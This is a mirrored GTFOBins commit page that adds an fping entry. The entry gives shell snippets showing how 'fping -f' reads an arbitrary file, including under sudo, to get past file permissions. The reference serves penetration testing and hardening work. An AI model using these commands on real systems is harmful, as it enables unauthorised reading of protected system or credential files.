1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add fping

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Madesh Turaka 2022-05-02 02:42:19 +05:30 committed by GitHub
parent 7bc41773f6
commit 242dcbab4f
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

11
_gtfobins/fping.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
fping -f $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo fping -f $LFILE
---